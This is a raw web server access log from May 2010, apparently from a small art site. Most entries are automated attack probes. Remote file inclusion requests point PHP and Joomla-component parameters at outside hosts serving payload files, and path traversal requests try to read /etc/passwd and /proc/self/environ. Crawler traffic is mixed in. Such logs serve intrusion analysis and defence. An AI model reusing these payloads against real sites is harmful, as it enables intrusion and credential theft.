87.207.148.125 - - [28/May/2010:03:54:03 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (compatible; Google Desktop)"
91.186.27.166 - - [28/May/2010:03:54:07 -0500] "GET /logs/access_log.1271462400//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.leehongsun.com//id1.txt? HTTP/1.1" 404 352 "-""Mozilla/5.0"
91.186.27.166 - - [28/May/2010:03:54:22 -0500] "GET //components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.leehongsun.com//id1.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
91.186.27.166 - - [28/May/2010:03:54:22 -0500] "GET /logs/access_log.1272240000//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.leehongsun.com//id1.txt? HTTP/1.1" 404 352 "-""Mozilla/5.0"
91.186.27.166 - - [28/May/2010:03:54:22 -0500] "GET /logs//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.leehongsun.com//id1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
91.186.27.166 - - [28/May/2010:03:54:31 -0500] "GET /logs/access_log.1271462400//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.leehongsun.com//id1.txt? HTTP/1.1" 404 352 "-""Mozilla/5.0"
209.44.120.3 - - [28/May/2010:03:54:51 -0500] "GET /logs//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
209.44.120.3 - - [28/May/2010:03:54:51 -0500] "GET //index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
207.46.204.187 - - [28/May/2010:03:57:58 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.204.187 - - [28/May/2010:03:57:59 -0500] "GET /logs/access_log.1176595200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
76.12.147.249 - - [28/May/2010:04:00:47 -0500] "GET /logs/*.php?option=livre_include&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.823"
76.12.147.249 - - [28/May/2010:04:00:47 -0500] "GET /*.php?option=livre_include&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 289 "-""libwww-perl/5.823"
76.12.147.249 - - [28/May/2010:04:03:13 -0500] "GET /logs/*.php?option=livre_include&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.823"
76.12.147.249 - - [28/May/2010:04:03:14 -0500] "GET /*.php?option=livre_include&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 289 "-""libwww-perl/5.823"
207.46.194.112 - - [28/May/2010:04:03:48 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
207.46.194.112 - - [28/May/2010:04:03:49 -0500] "GET /artwork/sandstone.gif HTTP/1.1" 200 94677 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
74.55.96.234 - - [28/May/2010:04:07:31 -0500] "GET //components/com_fabrik/libs/Blowfish/PHP.php?mosConfig.absolute.path=http://www.ovohely.hu/assets/images/autogen/ts?? HTTP/1.1" 404 328 "-""Microsoft Pocket Internet Explorer/0.6"
74.55.96.234 - - [28/May/2010:04:07:31 -0500] "GET /logs//components/com_fabrik/libs/Blowfish/PHP.php?mosConfig.absolute.path=http://www.ovohely.hu/assets/images/autogen/ts?? HTTP/1.1" 404 333 "-""Microsoft Pocket Internet Explorer/0.6"
121.88.4.141 - - [28/May/2010:04:12:35 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.howtolisten.kr//parti/data/admin/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
121.88.4.141 - - [28/May/2010:04:12:35 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.howtolisten.kr//parti/data/admin/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
121.88.4.141 - - [28/May/2010:04:12:38 -0500] "GET /logs/access_log.1274227200%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.howtolisten.kr//parti/data/admin/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
209.44.120.3 - - [28/May/2010:04:13:19 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.howtolisten.kr//parti/data/admin/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
209.44.120.3 - - [28/May/2010:04:13:20 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.howtolisten.kr//parti/data/admin/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
209.44.120.3 - - [28/May/2010:04:13:20 -0500] "GET /logs/access_log.1274227200%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.howtolisten.kr//parti/data/admin/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
216.129.119.43 - - [28/May/2010:04:13:45 -0500] "GET /logs/access_log.1264032000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
209.126.254.139 - - [28/May/2010:04:14:30 -0500] "GET //components/com_pcchess/include.pcchess.php?=http://bnydusa.com/en/wt/data/sc1? HTTP/1.1" 404 327 "-""Mozilla/5.0"
209.126.254.139 - - [28/May/2010:04:14:30 -0500] "GET /logs//components/com_pcchess/include.pcchess.php?=http://bnydusa.com/en/wt/data/sc1? HTTP/1.1" 404 332 "-""Mozilla/5.0"
209.126.254.139 - - [28/May/2010:04:14:30 -0500] "GET /logs/access_log.1273017600%20%20//components/com_pcchess/include.pcchess.php?=http://bnydusa.com/en/wt/data/sc1? HTTP/1.1" 404 356 "-""Mozilla/5.0"
209.126.254.139 - - [28/May/2010:04:15:13 -0500] "GET //components/com_pcchess/include.pcchess.php?=http://bnydusa.com/en/wt/data/sc1? HTTP/1.1" 404 327 "-""Mozilla/5.0"
209.126.254.139 - - [28/May/2010:04:15:13 -0500] "GET /logs/access_log.1273017600%20%20//components/com_pcchess/include.pcchess.php?=http://bnydusa.com/en/wt/data/sc1? HTTP/1.1" 404 356 "-""Mozilla/5.0"
209.126.254.139 - - [28/May/2010:04:15:13 -0500] "GET /logs//components/com_pcchess/include.pcchess.php?=http://bnydusa.com/en/wt/data/sc1? HTTP/1.1" 404 332 "-""Mozilla/5.0"
207.46.13.141 - - [28/May/2010:04:17:28 -0500] "GET /logs/access_log.1231027200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [28/May/2010:04:18:10 -0500] "GET /logs/access_log.1266019200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
121.88.4.141 - - [28/May/2010:04:18:13 -0500] "GET /logs/access_log.1270598400//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.howtolisten.kr//parti/data/admin/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
121.88.4.141 - - [28/May/2010:04:18:15 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.howtolisten.kr//parti/data/admin/id1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
121.88.4.141 - - [28/May/2010:04:18:15 -0500] "GET /logs/access_log.1274227200%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.howtolisten.kr//parti/data/admin/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
121.88.4.141 - - [28/May/2010:04:18:18 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.howtolisten.kr//parti/data/admin/id1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
209.126.254.139 - - [28/May/2010:04:18:38 -0500] "GET /logs/access_log.1273017600//components/com_pcchess/include.pcchess.php?=http://bnydusa.com/en/wt/data/sc1? HTTP/1.1" 404 354 "-""Mozilla/5.0"
121.88.4.141 - - [28/May/2010:04:18:50 -0500] "GET /logs/access_log.1271548800//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.howtolisten.kr//parti/data/admin/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
207.46.13.131 - - [28/May/2010:04:18:58 -0500] "GET /logs/access_log.1226707200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.194.86 - - [28/May/2010:04:20:42 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
207.46.194.86 - - [28/May/2010:04:20:42 -0500] "GET /artwork/motto-chair-waste3.jpg HTTP/1.1" 200 32078 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
121.88.4.141 - - [28/May/2010:04:21:50 -0500] "GET /logs/access_log.1270598400//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.howtolisten.kr//parti/data/admin/id1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
209.126.254.139 - - [28/May/2010:04:22:13 -0500] "GET /logs/access_log.1273017600//components/com_pcchess/include.pcchess.php?=http://bnydusa.com/en/wt/data/sc1? HTTP/1.1" 404 354 "-""Mozilla/5.0"
123.243.67.208 - - [28/May/2010:04:22:25 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
121.88.4.141 - - [28/May/2010:04:22:49 -0500] "GET /logs/access_log.1271548800//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.howtolisten.kr//parti/data/admin/id1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
67.195.112.180 - - [28/May/2010:04:23:06 -0500] "GET /logs/access_log.1228176000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.13.134 - - [28/May/2010:04:29:28 -0500] "GET /logs/access_log.1208476800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
174.133.201.194 - - [28/May/2010:04:29:46 -0500] "GET /logs/index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
174.133.201.194 - - [28/May/2010:04:29:46 -0500] "GET /index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
211.174.62.150 - - [28/May/2010:04:30:54 -0500] "GET /logs/access_log.1274313600/?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.808"
211.174.62.150 - - [28/May/2010:04:30:54 -0500] "GET /?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.808"
211.174.62.150 - - [28/May/2010:04:30:55 -0500] "GET /logs/?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7289 "-""libwww-perl/5.808"
211.174.62.150 - - [28/May/2010:04:32:49 -0500] "GET /?option=com_joomlaxplorer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.808"
207.46.199.238 - - [28/May/2010:04:34:57 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
207.46.199.238 - - [28/May/2010:04:34:57 -0500] "GET /artwork/jewelrybox-angel1.jpg HTTP/1.1" 200 57458 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
123.243.67.208 - - [28/May/2010:04:36:43 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
87.250.255.243 - - [28/May/2010:04:37:07 -0500] "GET /logs/access_log.1218758400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.204.244 - - [28/May/2010:04:37:29 -0500] "GET /logs/access_log.1230508800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
204.152.200.50 - - [28/May/2010:04:38:28 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
204.152.200.50 - - [28/May/2010:04:38:29 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
69.73.147.90 - - [28/May/2010:04:38:50 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
69.73.147.90 - - [28/May/2010:04:38:50 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
64.131.77.225 - - [28/May/2010:04:38:53 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
64.131.77.225 - - [28/May/2010:04:38:53 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
207.46.13.94 - - [28/May/2010:04:42:28 -0500] "GET /logs/access_log.1241913600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
174.37.183.194 - - [28/May/2010:04:43:00 -0500] "GET /logs/htmltonuke.php?filnavn=http://www.hotelcesareaugustus.com/swf/idxx.pdf?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
174.37.183.194 - - [28/May/2010:04:43:00 -0500] "GET /htmltonuke.php?filnavn=http://www.hotelcesareaugustus.com/swf/idxx.pdf?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
174.37.183.194 - - [28/May/2010:04:43:00 -0500] "GET /logs/access_log.1262822400/htmltonuke.php?filnavn=http://www.hotelcesareaugustus.com/swf/idxx.pdf?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
174.37.183.194 - - [28/May/2010:04:44:53 -0500] "GET /htmltonuke.php?filnavn=http://www.hotelcesareaugustus.com/swf/idxx.pdf?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
174.37.183.194 - - [28/May/2010:04:44:53 -0500] "GET /logs/htmltonuke.php?filnavn=http://www.hotelcesareaugustus.com/swf/idxx.pdf?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
174.37.183.194 - - [28/May/2010:04:44:54 -0500] "GET /logs/access_log.1262822400/htmltonuke.php?filnavn=http://www.hotelcesareaugustus.com/swf/idxx.pdf?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
121.247.78.133 - - [28/May/2010:04:45:34 -0500] "GET /logs/index?microcms-include.php?microcms_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
121.247.78.133 - - [28/May/2010:04:45:34 -0500] "GET /index?microcms-include.php?microcms_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.805"
174.37.183.194 - - [28/May/2010:04:46:04 -0500] "GET /logs/access_log.1272585600/htmltonuke.php?filnavn=http://www.hotelcesareaugustus.com/swf/idxx.pdf?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
216.127.70.140 - - [28/May/2010:04:48:36 -0500] "GET /logs/index.php?option=com_jeformcr&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.65"
209.44.120.3 - - [28/May/2010:04:48:37 -0500] "GET /logs/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
209.44.120.3 - - [28/May/2010:04:48:37 -0500] "GET /index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
216.127.70.140 - - [28/May/2010:04:48:37 -0500] "GET /logs/index.php?option=com_jeformcr&controller=../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.65"
216.127.70.140 - - [28/May/2010:04:48:38 -0500] "GET /logs/index.php?option=com_jeformcr&controller=../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.65"
216.127.70.140 - - [28/May/2010:04:48:39 -0500] "GET /logs/index.php?option=com_jeformcr&controller=../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.65"
216.127.70.140 - - [28/May/2010:04:48:41 -0500] "GET /logs/index.php?option=com_jeformcr&controller=../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.65"
216.127.70.140 - - [28/May/2010:04:48:42 -0500] "GET /logs/index.php?option=com_jeformcr&controller=../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.65"
209.44.120.2 - - [28/May/2010:04:48:43 -0500] "GET /logs/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
216.127.70.140 - - [28/May/2010:04:48:43 -0500] "GET /logs/index.php?option=com_jeformcr&controller=../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.65"
209.44.120.2 - - [28/May/2010:04:48:43 -0500] "GET /index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
216.127.70.140 - - [28/May/2010:04:48:44 -0500] "GET /logs/index.php?option=com_jeformcr&controller=../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.65"
216.127.70.140 - - [28/May/2010:04:48:45 -0500] "GET /logs/index.php?option=com_jeformcr&controller=../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.65"
216.127.70.140 - - [28/May/2010:04:48:46 -0500] "GET /logs/index.php?option=com_jeformcr&controller=../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.65"
216.127.70.140 - - [28/May/2010:04:48:47 -0500] "GET /logs/index.php?option=com_jeformcr&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.65"
216.127.70.140 - - [28/May/2010:04:48:48 -0500] "GET /logs/index.php?option=com_jeformcr&controller=../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.65"
216.127.70.140 - - [28/May/2010:04:48:50 -0500] "GET /logs/index.php?option=com_jeformcr&controller=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.65"
216.127.70.140 - - [28/May/2010:04:48:50 -0500] "GET /index.php?option=com_jeformcr&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.65"
216.127.70.140 - - [28/May/2010:04:48:51 -0500] "GET /index.php?option=com_jeformcr&controller=../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.65"
216.127.70.140 - - [28/May/2010:04:48:52 -0500] "GET /index.php?option=com_jeformcr&controller=../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.65"
216.127.70.140 - - [28/May/2010:04:48:53 -0500] "GET /index.php?option=com_jeformcr&controller=../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.65"
216.127.70.140 - - [28/May/2010:04:48:54 -0500] "GET /index.php?option=com_jeformcr&controller=../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.65"
216.127.70.140 - - [28/May/2010:04:48:55 -0500] "GET /index.php?option=com_jeformcr&controller=../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.65"
216.127.70.140 - - [28/May/2010:04:48:56 -0500] "GET /index.php?option=com_jeformcr&controller=../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.65"
216.127.70.140 - - [28/May/2010:04:48:59 -0500] "GET /index.php?option=com_jeformcr&controller=../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.65"
216.127.70.140 - - [28/May/2010:04:49:00 -0500] "GET /index.php?option=com_jeformcr&controller=../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.65"
216.127.70.140 - - [28/May/2010:04:49:01 -0500] "GET /index.php?option=com_jeformcr&controller=../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.65"
216.127.70.140 - - [28/May/2010:04:49:02 -0500] "GET /index.php?option=com_jeformcr&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.65"
216.127.70.140 - - [28/May/2010:04:49:03 -0500] "GET /index.php?option=com_jeformcr&controller=../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.65"
216.127.70.140 - - [28/May/2010:04:49:04 -0500] "GET /index.php?option=com_jeformcr&controller=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.65"
87.250.255.243 - - [28/May/2010:04:53:45 -0500] "GET /logs/access_log.1203033600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.13.134 - - [28/May/2010:04:56:28 -0500] "GET /logs/access_log.1190419200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [28/May/2010:05:02:34 -0500] "GET /logs/access_log.1223078400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.44.120.2 - - [28/May/2010:05:03:20 -0500] "GET /logs/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
209.44.120.2 - - [28/May/2010:05:03:20 -0500] "GET /index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
87.250.255.243 - - [28/May/2010:05:05:12 -0500] "GET /logs/access_log.1221177600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.13.50 - - [28/May/2010:05:05:28 -0500] "GET /logs/access_log.1158105600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.145 - - [28/May/2010:05:06:29 -0500] "GET /logs/access_log.1165017600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
64.131.77.225 - - [28/May/2010:05:07:37 -0500] "GET /logs/access_log.1274313600//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
64.131.77.225 - - [28/May/2010:05:07:37 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
64.131.77.225 - - [28/May/2010:05:07:38 -0500] "GET /logs//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
64.131.77.225 - - [28/May/2010:05:08:10 -0500] "GET /logs/access_log.1274227200//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
211.174.62.150 - - [28/May/2010:05:08:28 -0500] "GET /logs/access_log.1212451200/?option=com_joomlaxplorer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.808"
211.174.62.150 - - [28/May/2010:05:08:29 -0500] "GET /?option=com_joomlaxplorer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.808"
211.174.62.150 - - [28/May/2010:05:08:29 -0500] "GET /logs/?option=com_joomlaxplorer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7289 "-""libwww-perl/5.808"
69.73.147.90 - - [28/May/2010:05:08:50 -0500] "GET /logs/access_log.1274313600//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
69.73.147.90 - - [28/May/2010:05:08:50 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
69.73.147.90 - - [28/May/2010:05:08:50 -0500] "GET /logs//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
69.73.147.90 - - [28/May/2010:05:09:18 -0500] "GET /logs/access_log.1274227200//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
121.88.4.141 - - [28/May/2010:05:12:44 -0500] "GET /logs///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 308 "-""Mozilla/5.0"
121.88.4.141 - - [28/May/2010:05:12:46 -0500] "GET ///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 303 "-""Mozilla/5.0"
121.88.4.141 - - [28/May/2010:05:12:47 -0500] "GET /logs/access_log.1271548800///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 330 "-""Mozilla/5.0"
